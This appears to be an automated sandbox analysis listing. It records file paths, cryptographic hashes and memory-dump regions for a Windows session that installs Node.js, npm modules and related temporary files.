C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\locales\am.pak

MD5 34b24f035bad74764b7cc57420488180
SHA1 fac3fdba1a94d7676ac4d71447178cfbd1fa4e82
SHA256 9cff5c4af5997b45fb2a384bd73560e56bcb7710149e1a7e3e172d64e6eda025
SHA512 a01da4c45c6295a57248603f01a6b6231c4ce400aa3ec94e4228b26e8cea995c31d52b2008f99d0f17482aad80f1d67725c32e0f37cad6b012b1022ecde998f0

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\locales\af.pak

MD5 94af96b7f60a4cfb9d596cd8927ba37d
SHA1 556833517bc6ad77b5427000f2c3dccad91b92e6
SHA256 716e296c2f663ad90cdde85c5134582fc2305e5ebe10649fc9653bea533500a6
SHA512 6605688a373a358ff1dfbeda1c09dd031e4a63de662555f5304843c31eb3afcedbc8ffa4dae8ddc1483b04ea24cb709ecc639a9902caa68731d8e44d04cdbd83

memory/4268-777-0x0000000009BB0000-0x0000000009C26000-memory.dmp

memory/4268-779-0x0000000009B60000-0x0000000009B7E000-memory.dmp

memory/4268-802-0x000000000A110000-0x000000000A2D2000-memory.dmp

memory/4268-803-0x000000000AFC0000-0x000000000B4EC000-memory.dmp

memory/400-823-0x0000000140000000-0x000000014002B000-memory.dmp

memory/400-825-0x0000000140000000-0x000000014002B000-memory.dmp

memory/400-827-0x00007FFCF5CE0000-0x00007FFCF5D9E000-memory.dmp

memory/400-826-0x00007FFCF7870000-0x00007FFCF7A65000-memory.dmp

memory/400-822-0x0000000140000000-0x000000014002B000-memory.dmp

memory/400-821-0x0000000140000000-0x000000014002B000-memory.dmp

memory/400-820-0x0000000140000000-0x000000014002B000-memory.dmp

memory/400-829-0x0000000140000000-0x000000014002B000-memory.dmp

memory/616-832-0x000001BEE9640000-0x000001BEE9664000-memory.dmp

memory/316-843-0x00007FFCB78F0000-0x00007FFCB7900000-memory.dmp

memory/956-845-0x00000233727C0000-0x00000233727EB000-memory.dmp

memory/956-846-0x00007FFCB78F0000-0x00007FFCB7900000-memory.dmp

memory/392-849-0x00007FFCB78F0000-0x00007FFCB7900000-memory.dmp

memory/1328-883-0x000001FD849D0000-0x000001FD849FB000-memory.dmp

memory/1328-884-0x00007FFCB78F0000-0x00007FFCB7900000-memory.dmp

memory/1280-873-0x00007FFCB78F0000-0x00007FFCB7900000-memory.dmp

memory/1280-872-0x000001B1909A0000-0x000001B1909CB000-memory.dmp

memory/1208-869-0x00007FFCB78F0000-0x00007FFCB7900000-memory.dmp

memory/1208-868-0x0000020F13A30000-0x0000020F13A5B000-memory.dmp

memory/1200-866-0x00007FFCB78F0000-0x00007FFCB7900000-memory.dmp

memory/1200-865-0x0000013E3ED40000-0x0000013E3ED6B000-memory.dmp

memory/1104-863-0x00007FFCB78F0000-0x00007FFCB7900000-memory.dmp

memory/1104-862-0x000002461B6A0000-0x000002461B6CB000-memory.dmp

memory/1096-860-0x00007FFCB78F0000-0x00007FFCB7900000-memory.dmp

memory/1096-859-0x0000024869140000-0x000002486916B000-memory.dmp

memory/1028-857-0x00007FFCB78F0000-0x00007FFCB7900000-memory.dmp

memory/1028-856-0x000001210EA90000-0x000001210EABB000-memory.dmp

memory/392-848-0x000001E99A170000-0x000001E99A19B000-memory.dmp

memory/316-842-0x0000023302A70000-0x0000023302A9B000-memory.dmp

memory/672-838-0x00007FFCB78F0000-0x00007FFCB7900000-memory.dmp

memory/616-836-0x00007FFCB78F0000-0x00007FFCB7900000-memory.dmp

memory/672-835-0x000001FE4DEF0000-0x000001FE4DF1B000-memory.dmp

memory/616-834-0x000001BEE9670000-0x000001BEE969B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a2b24af1492f112d2e53cb7415fda39f
SHA1 dbfcee57242a14b60997bd03379cc60198976d85
SHA256 fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073
SHA512 9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0

C:\Users\Admin\AppData\Local\Temp\71F.tmp\nodejs-installer.msi

MD5 0df081aa47e7159e585488a161a97466
SHA1 2dc9a592dbb208624aff11a57f97bea89a315973
SHA256 20c578361911d7b0cf153b293b025970eca383a2c802e0df438ac254aaca165d
SHA512 2e1b58add6a714281f2ddeb936069c0eb8ce24ae2e440941379c4273afd7f1a96b162d5b88211e8678804bad652e48c99a4993e0e0d0da4d1abd7550d397e836

C:\Windows\Installer\MSI8EED.tmp

MD5 a6c7f0c329b28edb3e7f10d115d85c6d
SHA1 f36faaf4af452ab0bcd30ef66de7291bcee21264
SHA256 8f2e81c6f8ccd01dd1727cf93b82fe35b3abb8cf1ef3045dcd6cdf3346a59d03
SHA512 d7fb6997c9ff0dae74634422b8953a276604c0aa27b1e8d9ce4c87220fd469c6eecac6d86da857ff75378c535d2a684b4a120927c62f5267f1bd4dbdc05a72cf

C:\Windows\Installer\MSI8FCA.tmp

MD5 80bebea11fbe87108b08762a1bbff2cd
SHA1 a7ec111a792fd9a870841be430d130a545613782
SHA256 facf518f88cd67afd959c99c3ba233f78a4fbfe7fd3565489da74a585b55e9d1
SHA512 a760debb2084d801b6381a0e1dcef66080df03a768cc577b20b8472be87ad8477d59c331159555de10182d87340aa68fe1f3f5d0212048fd7692d85f4da656f6

C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\tuf\LICENSE

MD5 dfc1b916d4555a69859202f8bd8ad40c
SHA1 fc22b6ee39814d22e77fe6386c883a58ecac6465
SHA256 7b0ce3425a26fdba501cb13508af096ade77e4036dd2bd8849031ddecf64f7c9
SHA512 1fbe6bb1f60c8932e4dcb927fc8c8131b9c73afd824ecbabc2045e7af07b35a4155a0f8ad3103bf25f192b6d59282bfc927aead3cb7aaeb954e1b6dbd68369fa

C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\verify\dist\shared.types.js

MD5 24563705cc4bb54fccd88e52bc96c711
SHA1 871fa42907b821246de04785a532297500372fc7
SHA256 ef1f170ad28f2d870a474d2f96ae353d770fff5f20e642cd8f9b6f1d7742df13
SHA512 2ce8d2cf580623358fef5f4f8925d0c9943a657c2503c80048ca789bf16eacdb980bfc8aaaa50101a738e939926fcf2545500484dcad782c700ee206d8c6f9b9

C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\LICENSE

MD5 d2cf52aa43e18fdc87562d4c1303f46a
SHA1 58fb4a65fffb438630351e7cafd322579817e5e1
SHA256 45e433413760dc3ae8169be5ed9c2c77adc31ad4d1bc5a28939576df240f29a0
SHA512 54e33d7998b5e9ba76b2c852b4d0493ebb1b1ee3db777c97e6606655325ff66124a0c0857ca4d62de96350dbaee8d20604ec22b0edc17b472086da4babbbcb16

C:\Program Files\nodejs\node_modules\npm\node_modules\chalk\license

MD5 b862aeb7e1d01452e0f07403591e5a55
SHA1 b8765be74fea9525d978661759be8c11bab5e60e
SHA256 fcf1a18be2e25ba82acf2c59821b030d8ee764e4e201db6ef3c51900d385515f
SHA512 885369fe9b8cb0af1107ee92b52c6a353da7cf75bc86abb622e2b637c81e9c5ffe36b0ac74e11cfb66a7a126b606fe7a27e91f3f4338954c847ed2280af76a5f

C:\Program Files\nodejs\node_modules\npm\node_modules\env-paths\license

MD5 5ad87d95c13094fa67f25442ff521efd
SHA1 01f1438a98e1b796e05a74131e6bb9d66c9e8542
SHA256 67292c32894c8ac99db06ffa1cb8e9a5171ef988120723ebe673bf76712260ec
SHA512 7187720ccd335a10c9698f8493d6caa2d404e7b21731009de5f0da51ad5b9604645fbf4bc640aa94513b9eb372aa6a31df2467198989234bc2afbce87f76fbc3

C:\Program Files\nodejs\node_modules\npm\node_modules\gauge\LICENSE.md

MD5 2916d8b51a5cc0a350d64389bc07aef6
SHA1 c9d5ac416c1dd7945651bee712dbed4d158d09e1
SHA256 733dcbf5b1c95dc765b76db969b998ce0cbb26f01be2e55e7bccd6c7af29cb04
SHA512 508c5d1842968c478e6b42b94e04e0b53a342dfaf52d55882fdcfe02c98186e9701983ab5e9726259fba8336282e20126c70d04fc57964027586a40e96c56b74

C:\Program Files\nodejs\node_modules\npm\node_modules\ignore-walk\LICENSE

MD5 b020de8f88eacc104c21d6e6cacc636d
SHA1 20b35e641e3a5ea25f012e13d69fab37e3d68d6b
SHA256 3f24d692d165989cd9a00fe35ca15a2bc6859e3361fa42aa20babd435f2e4706
SHA512 4220617e29dd755ad592295bc074d6bc14d44a1feeed5101129669f3ecf0e34eaa4c7c96bbc83da7352631fa262baab45d4a370dad7dabec52b66f1720c28e38

C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmsearch\LICENSE

MD5 072ac9ab0c4667f8f876becedfe10ee0
SHA1 0227492dcdc7fb8de1d14f9d3421c333230cf8fe
SHA256 2ef361317adeda98117f14c5110182c28eae233af1f7050c83d4396961d14013
SHA512 f38fd6506bd9795bb27d31f1ce38b08c9e6f1689c34fca90e9e1d5194fa064d1f34a9c51d15941506ebbbcd6d4193055e9664892521b7e39ebcd61c3b6f25013

C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\LICENSE

MD5 d7c8fab641cd22d2cd30d2999cc77040
SHA1 d293601583b1454ad5415260e4378217d569538e
SHA256 04400db77d925de5b0264f6db5b44fe6f8b94f9419ad3473caaa8065c525c0be
SHA512 278ff929904be0c19ee5fb836f205e3e5b3e7cec3d26dd42bbf1e7e0ca891bf9c42d2b28fce3741ae92e4a924baf7490c7c6c59284127081015a82e2653e0764

C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\index.js

MD5 bc0c0eeede037aa152345ab1f9774e92
SHA1 56e0f71900f0ef8294e46757ec14c0c11ed31d4e
SHA256 7a395802fbe01bb3dc8d09586e0864f255874bf897378e546444fbaec29f54c5
SHA512 5f31251825554bf9ed99eda282fa1973fcec4a078796a10757f4fb5592f2783c4ebdd00bdf0d7ed30f82f54a7668446a372039e9d4589db52a75060ca82186b3

C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\package.json

MD5 d116a360376e31950428ed26eae9ffd4
SHA1 192b8e06fb4e1f97e5c5c7bf62a9bff7704c198b
SHA256 c3052bd85910be313e38ad355528d527b565e70ef15a784db3279649eee2ded5
SHA512 5221c7648f4299234a4637c47d3f1eb5e147014704913bc6fdad91b9b6a6ccc109bced63376b82b046bb5cad708464c76fb452365b76dbf53161914acf8fb11a

C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\LICENSE

MD5 7428aa9f83c500c4a434f8848ee23851
SHA1 166b3e1c1b7d7cb7b070108876492529f546219f
SHA256 1fccd0ad2e7e0e31ddfadeaf0660d7318947b425324645aa85afd7227cab52d7
SHA512 c7f01de85f0660560206784cdf159b2bdc5f1bc87131f5a8edf384eba47a113005491520b0a25d3cc425985b5def7b189e18ff76d7d562c434dc5d8c82e90cce

C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\dist\commonjs\package.json

MD5 56368b3e2b84dac2c9ed38b5c4329ec2
SHA1 f67c4acef5973c256c47998b20b5165ab7629ed4
SHA256 58b55392b5778941e1e96892a70edc12e2d7bb8541289b237fbddc9926ed51bd
SHA512 d662bff3885118e607079fcbeedb27368589bc0ee89f90b9281723fa08bda65e5a08d9640da188773193c0076ec0a5c92624673a6a961490be163e2553d6f482

C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\dist\esm\package.json

MD5 2324363c71f28a5b7e946a38dc2d9293
SHA1 7eda542849fb3a4a7b4ba8a7745887adcade1673
SHA256 1bf0e53fc74b05f1aade7451fbac72f1944b067d4229d96bae7a225519a250e4
SHA512 7437cf8f337d2562a4046246fbfcc5e9949f475a1435e94efbc4b6a55880050077d72692cbc3413e0ccd8f36adf9956a6cc633a2adc85fbff6c4aa2b8edac677

C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi\node_modules\emoji-regex\index.js

MD5 9841536310d4e186a474dfa2acf558cd
SHA1 33fabbcc5e1adbe0528243eafd36e5d876aaecaa
SHA256 5b3c0ac6483d83e6c079f9ffd1c7a18e883a9aaeaedb2d65dd9d5f78153476b9
SHA512 b67680a81bb4b62f959ba66476723eb681614925f556689e4d7240af8216a49f0d994c31381bf6a9489151d14ed8e0d0d4d28b66f02f31188059c9b24aaa3783

C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi\node_modules\emoji-regex\es2015\index.js

MD5 cf8f16c1aa805000c832f879529c070c
SHA1 54cc4d6c9b462ad2de246e28cd80ed030504353d
SHA256 77f404d608e2a98f2a038a8aa91b83f0a6e3b4937e5de35a8dae0c23aa9ee573
SHA512 a786e51af862470ae46ad085d33281e45795c24897e64b2c4b265302fa9cbfa47b262ec188adbc80d51cfc6ba395b500c0d7f5d343ca4fc2b828eaedba4bd29a

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js documentation.url

MD5 1c1f6159630c170b596af7c9085f8bb0
SHA1 ac26cfe43e10a9f76aee943f9ceff3dc77df29fd
SHA256 61403502b3d584ab749a417955dda3d6c956e64109cc4ac4e46e44b462b7c4f0
SHA512 f93d2e86c287ed4e50a0c00bcd9594c322cfbd0507bbd191d97c7dd2881850296986139df9580ba1bbaae8abab284335db64c41f6edde441e34fa56b934c3046

C:\Config.Msi\e588b27.rbs

MD5 5e34d0c3af1423ce5bba2bcf7df7a153
SHA1 0743368cf873e4104b07a85f8ada81151a4f03df
SHA256 a1fe4f441c82667711092fae97abf19e67ce7215681953f3676ae6a72b31133f
SHA512 cc989fea4b3a616d02c95ef61ff3ca9d947b1ca62f97d0010f5d32453b7b716985b95083f4eb41ae18d839948dbf07af235abb7eea95631221573b3feb5d107b

C:\Windows\Installer\MSIF629.tmp

MD5 74528af81c94087506cebcf38eeab4bc
SHA1 20c0ddfa620f9778e9053bd721d8f51c330b5202
SHA256 2650b77afbbc1faacc91e20a08a89fc2756b9db702a8689d3cc92aa163919b34
SHA512 9ce76594f64ea5969fff3becf3ca239b41fc6295bb3abf8e95f04f4209bb5ccddd09c76f69e1d3986a9fe16b4f0628e4a5c51e2d2edf3c60205758c40da04dae

memory/860-3271-0x00000281E9240000-0x00000281E99E6000-memory.dmp

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js command prompt.lnk

MD5 7447652ef22ae66e1f7c284bd1e7cce5
SHA1 8af7397906b478ace48d55ef27ce563ab50a891d
SHA256 259c8a7c0d5099d16250ec2e696f609254ee6532ce7ab21bb4dcdf26802fecaa
SHA512 1f597e1bad991efeda8ae20db22168080662c02925fcbbfa1aec788ca749dc909d813e8cf058a6874fcadb849db9fae078b4ae5a257757b08babb2df107bf3c4

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Install Additional Tools for Node.js.lnk

MD5 26c75574a7ce9e53fc65bc05b1e9b683
SHA1 28a42b91e3eb6d21dafce2f0756abd378b0a5e96
SHA256 eb962b2df12c33e679bf57a2aa324e134152c0f05d816fd56ca1c66532b74cf3
SHA512 d85acaefdf13ef457ee66240858ec60b81b3f3268b48506ce1ce0e7b5ddcd193358f7bf2c3336a84f871156ff00dff3aaff99ee8415516260d60d2ca8044ec25

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js website.url

MD5 35b86e177ab52108bd9fed7425a9e34a
SHA1 76a1f47a10e3ab829f676838147875d75022c70c
SHA256 afaa6c6335bd3db79e46fb9d4d54d893cee9288e6bb4738294806a9751657319
SHA512 3c8047c94b789c8496af3c2502896cef2d348ee31618893b9b71244af667ec291dcb9b840f869eb984624660086db0c848d1846aa601893e6f9955e56da19f62

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

MD5 09a6820310f95d9488aa51ee3c7d5f48
SHA1 4aa28ea7490ea351566e10845454797aed236e9b
SHA256 eee606110023b620c9c70d14fd1431cb7521be2cf060a24b6742d4e96be3e756
SHA512 982610707d08a8da4671cb054766c86d3a3ba15f66729a32ab4dab65d82cba5fee4b5f6662e5b052eb651d37aa663528bd2e1fba9fe6a5ac11274c0f5cf92566